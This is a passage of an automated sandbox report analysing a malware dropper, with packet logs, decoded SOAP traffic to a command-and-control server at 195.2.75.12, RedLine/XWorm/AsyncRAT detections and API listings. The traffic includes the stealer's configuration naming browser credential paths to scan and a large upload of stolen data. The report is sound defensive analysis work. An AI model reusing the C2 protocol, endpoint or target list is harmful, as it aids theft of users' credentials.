May 26, 2024 01:21:27.150413990 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.150526047 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.150568008 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.150710106 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.150759935 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.150885105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.151062965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.151109934 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.151407957 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.151423931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.151469946 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.151511908 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.151669025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.151719093 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.151846886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.152333975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.152381897 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.152455091 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.152595043 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.152642965 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.153219938 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.153309107 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.153356075 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.153505087 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.153522015 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.153568029 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.156927109 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.156958103 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.157006025 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.181308031 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.181416988 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.181471109 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.181494951 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.181669950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.181687117 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.181829929 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.182215929 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.182329893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.182404041 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.186079025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.186132908 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.186147928 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.186187029 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.186187029 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.186455965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.186520100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.186539888 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.186625957 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.186706066 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.186707020 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.186846018 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.187047958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.187098980 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.187567949 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.187586069 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.187638044 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.187666893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.187845945 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.187891006 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.187994003 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.188496113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.188546896 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.188575983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.188786030 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.188795090 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.188841105 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.189404011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.189461946 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.189502001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.189519882 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.189564943 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.189675093 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.190340042 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.190393925 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.190464973 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.190619946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.190638065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.190674067 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.190938950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.190994024 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.191235065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.191348076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.191396952 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.191497087 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.192159891 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.192214012 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.192246914 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.192446947 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.192465067 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.192500114 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.196172953 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.196190119 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.196227074 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.223221064 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.223249912 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.223417044 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.223426104 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.223499060 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.223514080 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.223738909 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.223927975 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.223952055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.224653959 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.224670887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.224684954 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.224700928 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.224819899 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.224821091 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.225141048 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.225192070 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.225256920 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.226052046 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.226068974 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.226109028 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.226159096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.226210117 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:27.226373911 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.226610899 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:27.226629019 CEST	7000	49730	195.2.75.12	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 26, 2024 01:21:43.848609924 CEST	192.168.2.4	1.1.1.1	0xbe26	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 26, 2024 01:21:43.856234074 CEST	1.1.1.1	192.168.2.4	0xbe26	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	195.2.75.12	54762	7776	C:\Users\user\AppData\Local\Temp\r.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 01:21:37.679641962 CEST	238	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 195.2.75.12:54762 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
May 26, 2024 01:21:38.363415956 CEST	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 25 May 2024 23:21:38 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
May 26, 2024 01:21:43.417973042 CEST	221	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 195.2.75.12:54762 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
May 26, 2024 01:21:43.637818098 CEST	25	IN	HTTP/1.1 100 Continue
May 26, 2024 01:21:43.778143883 CEST	1236	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 25 May 2024 23:21:43 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	195.2.75.12	54762	7776	C:\Users\user\AppData\Local\Temp\r.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 01:21:46.935935974 CEST	219	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 195.2.75.12:54762 Content-Length: 930799 Expect: 100-continue Accept-Encoding: gzip, deflate
May 26, 2024 01:21:48.765877008 CEST	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 25 May 2024 23:21:48 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	195.2.75.12	54762	7776	C:\Users\user\AppData\Local\Temp\r.exe

Timestamp	Bytes transferred	Direction	Data
May 26, 2024 01:21:48.774605989 CEST	239	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 195.2.75.12:54762 Content-Length: 930791 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
May 26, 2024 01:21:49.524488926 CEST	25	IN	HTTP/1.1 100 Continue
May 26, 2024 01:21:49.799566984 CEST	25	IN	HTTP/1.1 100 Continue
May 26, 2024 01:21:50.592432022 CEST	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 25 May 2024 23:21:50 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	19:21:01
Start date:	25/05/2024
Path:	C:\Users\user\Desktop\KR6CT3hIxT.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\KR6CT3hIxT.exe"
Imagebase:	0x7ff7e1db0000
File size:	7'616'416 bytes
MD5 hash:	5C95D5493DDA877B228A6485A6D40D9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	19:21:03
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\Temp\4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\4.exe"
Imagebase:	0xb60000
File size:	3'597'220 bytes
MD5 hash:	D7E09993B21575A255D4CEAF706C205A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 41%, ReversingLabs Detection: 44%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	19:21:04
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\Temp\3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\3.exe"
Imagebase:	0xf10000
File size:	3'275'435 bytes
MD5 hash:	215F503316C98618DC6DB327477FD26F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.4149652457.0000000000F12000.00000040.00000001.01000000.0000000A.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.4157787084.0000000003381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 49%, ReversingLabs Detection: 55%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	19:21:28
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\Temp\rdegje.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\rdegje.exe"
Imagebase:	0xed0000
File size:	3'670'637 bytes
MD5 hash:	823F263A3D860454EF8092594FFB7EC0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs Detection: 35%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	19:21:28
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\Temp\r.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\r.exe"
Imagebase:	0xe10000
File size:	3'351'536 bytes
MD5 hash:	CF1A74B1E40E5C34DF68ADD35DA92129
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.2159289645.0000000000E12000.00000040.00000001.01000000.0000000D.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs Detection: 53%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	19:21:28
Start date:	25/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	27.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	23

Executed Functions

Function 00007FF7E1DDB190 Relevance: 123.9, APIs: 60, Strings: 10, Instructions: 1421windowfilesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E1DB255C: GetDlgItem.USER32 ref: 00007FF7E1DB25AC
Part of subcall function 00007FF7E1DB255C: SetDlgItemTextW.USER32 ref: 00007FF7E1DB25C8

EndDialog.USER32 ref: 00007FF7E1DDB2D0
SetDlgItemTextW.USER32 ref: 00007FF7E1DDB320
GetMessageW.USER32 ref: 00007FF7E1DDB350
IsDialogMessageW.USER32 ref: 00007FF7E1DDB369
TranslateMessage.USER32 ref: 00007FF7E1DDB37B
DispatchMessageW.USER32 ref: 00007FF7E1DDB389
EndDialog.USER32 ref: 00007FF7E1DDB3D3
GetDlgItem.USER32 ref: 00007FF7E1DDB410
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDB431
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDB449
SetFocus.USER32 ref: 00007FF7E1DDB452
GetLastError.KERNEL32 ref: 00007FF7E1DDB634
GetLastError.KERNEL32 ref: 00007FF7E1DDB665
GetTickCount.KERNEL32 ref: 00007FF7E1DDB68B
GetLastError.KERNEL32 ref: 00007FF7E1DDB6F5
GetCommandLineW.KERNEL32 ref: 00007FF7E1DDB841
CreateFileMappingW.KERNEL32 ref: 00007FF7E1DDB900
MapViewOfFile.KERNEL32 ref: 00007FF7E1DDB923
Sleep.KERNEL32 ref: 00007FF7E1DDB9B6
UnmapViewOfFile.KERNEL32 ref: 00007FF7E1DDB9DF
CloseHandle.KERNEL32 ref: 00007FF7E1DDB9E8
SetDlgItemTextW.USER32 ref: 00007FF7E1DDBCDE
DialogBoxParamW.USER32 ref: 00007FF7E1DDC0D7
EndDialog.USER32 ref: 00007FF7E1DDC0EF
EnableWindow.USER32 ref: 00007FF7E1DDC2A6
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDC2F8
ShellExecuteExW.SHELL32 ref: 00007FF7E1DDB95B

Part of subcall function 00007FF7E1DCAAE0: LoadStringW.USER32 ref: 00007FF7E1DCAB67
Part of subcall function 00007FF7E1DCAAE0: LoadStringW.USER32 ref: 00007FF7E1DCAB80

IsDlgButtonChecked.USER32 ref: 00007FF7E1DDBEC3
SendDlgItemMessageW.USER32 ref: 00007FF7E1DDBEEA
GetDlgItem.USER32 ref: 00007FF7E1DDBEF8
IsDlgButtonChecked.USER32 ref: 00007FF7E1DDBF12
GetDlgItem.USER32 ref: 00007FF7E1DDBF4F
SetDlgItemTextW.USER32 ref: 00007FF7E1DDBFEC
SetDlgItemTextW.USER32 ref: 00007FF7E1DDC004
SetDlgItemTextW.USER32 ref: 00007FF7E1DDC321
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDC363
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDC369
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDC36F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDC375
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDC37B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDC381
SendDlgItemMessageW.USER32 ref: 00007FF7E1DDC449
EndDialog.USER32 ref: 00007FF7E1DDC463
GetDlgItem.USER32 ref: 00007FF7E1DDC491
SetFocus.USER32 ref: 00007FF7E1DDC49A
SendDlgItemMessageW.USER32 ref: 00007FF7E1DDC53E
FindFirstFileW.KERNEL32 ref: 00007FF7E1DDC562
FindClose.KERNEL32 ref: 00007FF7E1DDC68A
SendDlgItemMessageW.USER32 ref: 00007FF7E1DDC7AF

Part of subcall function 00007FF7E1DB129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E1DB1396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDCAA9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDCAAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDCAB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDCABB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDCAC1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DDCAC7

Strings

winrarsfxmappingfile.tmp, xrefs: 00007FF7E1DDB8E0
REPLACEFILEDLG, xrefs: 00007FF7E1DDC3D3
-el -s2 "-d%s" "-sp%s", xrefs: 00007FF7E1DDB799
@, xrefs: 00007FF7E1DDB7B6
__tmp_rar_sfx_access_check_, xrefs: 00007FF7E1DDB6A9
STARTDLG, xrefs: 00007FF7E1DDB1CA
%s %s, xrefs: 00007FF7E1DDC6D9, 00007FF7E1DDC946
runas, xrefs: 00007FF7E1DDB7C9
p, xrefs: 00007FF7E1DDB7AB
